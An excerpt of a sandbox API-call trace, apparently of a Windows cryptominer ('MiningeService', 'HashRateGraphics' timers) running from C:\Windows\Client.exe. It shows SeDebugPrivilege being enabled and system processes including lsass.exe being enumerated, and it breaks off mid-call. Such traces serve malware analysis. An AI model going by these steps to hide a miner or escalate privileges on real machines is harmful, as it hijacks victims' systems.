[0287.565] CharLowerBuffW (in: lpsz="RegActivityUserKillMain", cchLength=0x17 | out: lpsz="regactivityuserkillmain") returned 0x17 [0287.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RegActivityUserKillMainTimer", cchWideChar=28, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegActivityUserKillMainTimer", lpUsedDefaultChar=0x0) returned 28 [0287.565] KillTimer (hWnd=0x3006c, uIDEvent=0x1) returned 0 [0287.565] SetTimer (hWnd=0x3006c, nIDEvent=0x1, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x1 [0287.565] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.565] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3004e [0287.566] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x3004e, lParam=0x18f808) returned 0x0 [0287.566] SetWindowLongW (hWnd=0x3004e, nIndex=-4, dwNewLong=3018553) returned 4290132 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] CharLowerBuffW (in: lpsz="HashRateGraphics", cchLength=0x10 | out: lpsz="hashrategraphics") returned 0x10 [0287.566] CharLowerBuffW (in: lpsz="HashRateGraphics", cchLength=0x10 | out: lpsz="hashrategraphics") returned 0x10 [0287.566] CharLowerBuffW (in: lpsz="HashRateGraphics", cchLength=0x10 | out: lpsz="hashrategraphics") returned 0x10 [0287.566] KillTimer (hWnd=0x3004e, uIDEvent=0x1) returned 0 [0287.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HashRateGraphicsTimer", cchWideChar=21, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HashRateGraphicsTimer\x18", lpUsedDefaultChar=0x0) returned 21 [0287.566] KillTimer (hWnd=0x3004e, uIDEvent=0x1) returned 0 [0287.566] SetTimer (hWnd=0x3004e, nIDEvent=0x1, uElapse=0x1b7740, lpTimerFunc=0x0) returned 0x1 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] GetCurrentThreadId () returned 0xd44 [0287.566] FreeResource (hResData=0x8d8684) returned 0 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] GetCurrentThreadId () returned 0xd44 [0287.567] SetEvent (hEvent=0xe8) returned 1 [0287.567] SetEvent (hEvent=0xe4) returned 1 [0287.567] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fc94, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0287.567] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fc70, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0287.567] GetPrivateProfileStringW (in: lpAppName="NameServices", lpKeyName="value", lpDefault="MiningeService", lpReturnedString=0x18ee84, nSize=0x800, lpFileName="C:\\Windows\\parameters.ini" | out: lpReturnedString="MiningeService") returned 0xe [0287.571] WritePrivateProfileStringW (lpAppName=0x0, lpKeyName=0x0, lpString=0x0, lpFileName="C:\\Windows\\parameters.ini") returned 0 [0287.572] GetCurrentProcess () returned 0xffffffff [0287.572] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x18fea4 | out: TokenHandle=0x18fea4*=0x170) returned 1 [0287.572] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18fe94 | out: lpLuid=0x18fe94*(LowPart=0x14, HighPart=0)) returned 1 [0287.574] AdjustTokenPrivileges (in: TokenHandle=0x170, DisableAllPrivileges=0, NewState=0x18fe90*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x18fea0 | out: PreviousState=0x0, ReturnLength=0x18fea0) returned 1 [0287.574] CloseHandle (hObject=0x170) returned 1 [0287.574] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x779e0000 [0287.574] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NtQuerySystemInformation", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0287.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NtQuerySystemInformation", cchWideChar=24, lpMultiByteStr=0x9dff3c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NtQuerySystemInformation", lpUsedDefaultChar=0x0) returned 24 [0287.575] GetProcAddress (hModule=0x779e0000, lpProcName="NtQuerySystemInformation") returned 0x779ffda0 [0287.575] NtQuerySystemInformation (in: SystemInformationClass=0x0, SystemInformation=0x18fe88, Length=0x2c, ResultLength=0x18fe84 | out: SystemInformation=0x18fe88, ResultLength=0x18fe84*=0x2c) returned 0x0 [0287.575] GetTickCount () returned 0x1fd54e9 [0287.575] GetTickCount () returned 0x1fd54e9 [0287.575] GetTickCount () returned 0x1fd54e9 [0287.575] GetTickCount () returned 0x1fd54e9 [0287.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9410f0, Length=0x1000, ResultLength=0x18fd40 | out: SystemInformation=0x9410f0, ResultLength=0x18fd40*=0x10490) returned 0xc0000004 [0287.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9410f0, Length=0x2000, ResultLength=0x18fd40 | out: SystemInformation=0x9410f0, ResultLength=0x18fd40*=0x10490) returned 0xc0000004 [0287.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9410f0, Length=0x4000, ResultLength=0x18fd40 | out: SystemInformation=0x9410f0, ResultLength=0x18fd40*=0x10490) returned 0xc0000004 [0287.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9410f0, Length=0x8000, ResultLength=0x18fd40 | out: SystemInformation=0x9410f0, ResultLength=0x18fd40*=0x10490) returned 0xc0000004 [0287.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x929d90, Length=0x10000, ResultLength=0x18fd40 | out: SystemInformation=0x929d90, ResultLength=0x18fd40*=0x10490) returned 0xc0000004 [0287.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x909d60, Length=0x20000, ResultLength=0x18fd40 | out: SystemInformation=0x909d60, ResultLength=0x18fd40*=0xca90) returned 0x0 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="System", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="System", cchWideChar=6, lpMultiByteStr=0x9ccb2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 6 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x9ccb2c, cbMultiByte=6, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="System") returned 6 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="smss.exe\x10") returned 8 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="csrss.exe") returned 9 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="wininit.exe¦Ố¦") returned 11 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="csrss.exexe¦Ố¦") returned 9 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="winlogon.exeỐ¦") returned 12 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="services.exeỐ¦") returned 12 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="lsass.exeexeỐ¦") returned 9 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="lsm.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="lsm.exe", cchWideChar=7, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsm.exe", lpUsedDefaultChar=0x0) returned 7 [0287.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="lsm.exexeexeỐ¦") returned 7 [0287.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="explorer.exeỐ¦") returned 12 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="dwm.exer.exeỐ¦") returned 7 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="spoolsv.exeeỐ¦") returned 11 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="taskhost.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="taskhost.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhost.exe", lpUsedDefaultChar=0x0) returned 12 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="taskhost.exeỐ¦") returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeỐ¦") returned 11 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0xa11f0c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=20, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="OfficeClickToRun.exe㚐£↠¦") returned 20 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="WmiPrvSE.exeoRun.exe㚐£↠¦") returned 12 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0287.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="svchost.exeeoRun.exe㚐£↠¦") returned 11 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0287.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10 [0287.591] MultiByteToWideChar 